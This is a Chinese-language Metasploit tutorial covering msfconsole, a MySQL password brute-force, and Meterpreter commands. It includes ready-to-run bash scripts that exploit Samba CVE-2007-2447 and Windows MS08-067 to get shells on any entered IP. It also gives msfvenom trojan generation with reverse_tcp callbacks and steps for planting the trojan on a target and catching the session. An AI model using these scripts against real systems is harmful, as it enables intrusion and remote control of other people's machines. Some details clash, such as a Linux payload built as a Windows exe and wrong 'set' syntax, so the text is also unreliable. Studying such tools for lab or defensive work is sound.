Metasploit使⽤教程(操作实例,meterpreter,msfconsole,ms。。。
1、控制Metasploit终端(MSFCONSOLE)
MSFCONSOLE主要⽤于管理Metasploit数据库,管理会话,配置并启动Matasploit模块
⼀些通⽤命令:
help:该命令允许⽤户查看执⾏命令的帮助信息
use module:该命令允许⽤户加载选择的模块
set optionname module:该命令允许⽤户为模块设置不同的选项。
run:该命令⽤来启动⼀个⾮渗透攻击模块
search module:该命令允许⽤户搜索⼀个特定的模块
exit:退出MSFCONSOLE
操作步骤:
1)、终端启动MSFCONSOLE
当出现msf>提⽰符,表⽰msfconsole启动成功
2)、使⽤search命令搜索所有有效的mysql模块
输出的信息显⽰为4列:模块名称,公开时间,等级、描述
3)、使⽤ mysql扫描模块
4)、显⽰模块的有效选项
输出的信息显⽰为4列:选项名称,当前设置,需求及描述,其中Required为yes的选项是必须配置的,选项的作⽤在描述中可以了解到5)、为渗透攻击指定⽬标系统,⽤户⽂件和密码⽂件配置
根据Required可以看到必须配置但是还未配置的选项有RHOSTS即⽬标主机IP
其中选项USER_FILE 和PASS_FILE指定渗透的⽤户⽂件和密码⽂件,类似于爆破中的字典⽂件
6)、启动渗透攻击
测试出⽤户的名称和密码分别是root和password
2、控制Metasploit命令⾏接⼝(MSFCLI:⼀个接⼝)
但在2015年以后,Msfconsole中的-x选项代替Msfcli
参考链接
操作实例(利⽤CVE-2007-2447获得linux命令⾏的shell)Samba MS-RPC Shell命令注⼊漏洞
编写shell脚本test.sh
#!/bin/bash
echo"please set RHOST IP"
read -p "IP:" IP
msfconsole -x "use multi/samba/usermap_script;\set payload cmd/unix/bind_netcat;\set RHOST $IP;\run"
chmod +x test.sh 给脚本执⾏权限
./test.sh执⾏脚本
得到shell
还可以利⽤msfconsole命令⾏得到shell search CVE-2007-2447
利⽤ms08_067漏洞得到win xp的shell
#!/bin/bash
echo"please set RHOST IP"
read -p "IP:" IP
msfconsole -x "use  exploit/windows/smb/ms08_067_netapi;\set payload windows/meterpreter/reverse_tcp;\set RHOST $IP;\run"
3、控制Meterpreter
通常作为利⽤漏洞后的攻击载荷所使⽤,攻击载荷在触发漏洞后能返回给⽤户⼀个控制通道,当获取⽬标系统上的⼀个Meterpreter连接时,⽤户必须使⽤Meterpreter传递攻击载荷。msfconsole⽤于管理⽤户会话,⽽Meterpreter则是攻击载荷和渗透攻击交互。
⼀些常⽤命令:
help:查看帮助信息
background:允许⽤户在后台Meterpreter会话
download:允许⽤户从⼊侵主机上下载⽂件
upload:允许⽤户上传⽂件到⼊侵主机
execute:允许⽤户在⼊侵主机上执⾏命令
console命令大全
shell:允许⽤户在⼊侵主机(仅是win主机)允许shell 命令
session -i:允许⽤户切换会话
实例:远程控制windows系统
⽣成⽊马⽂件
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=IP lport=4444  -f exe -
lhost和lport都设置为本地的ip和监听端⼝
设法将⽊马⽂件拷贝到⽬标主机,等待⽬标主机运⾏程序
使⽤handler模块
use exploit/multi/handler
设置payload与上述⼀致
设置lhost和lport
exploit实施监听
当⽬标主机执⾏了控制软件之后,将连接到Meterpreter,开启会话,控制win系统(使⽤的还是linux命令)
4、渗透攻击应⽤
远程登录
渗透攻击samba服务
samba是⼀套实现SMB协议、跨平台进⾏⽂件共享和打印共享服务的程序,对应的端⼝号有139和445,只要开启这个端⼝后,极可能存在Samba服务远程溢出漏洞

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。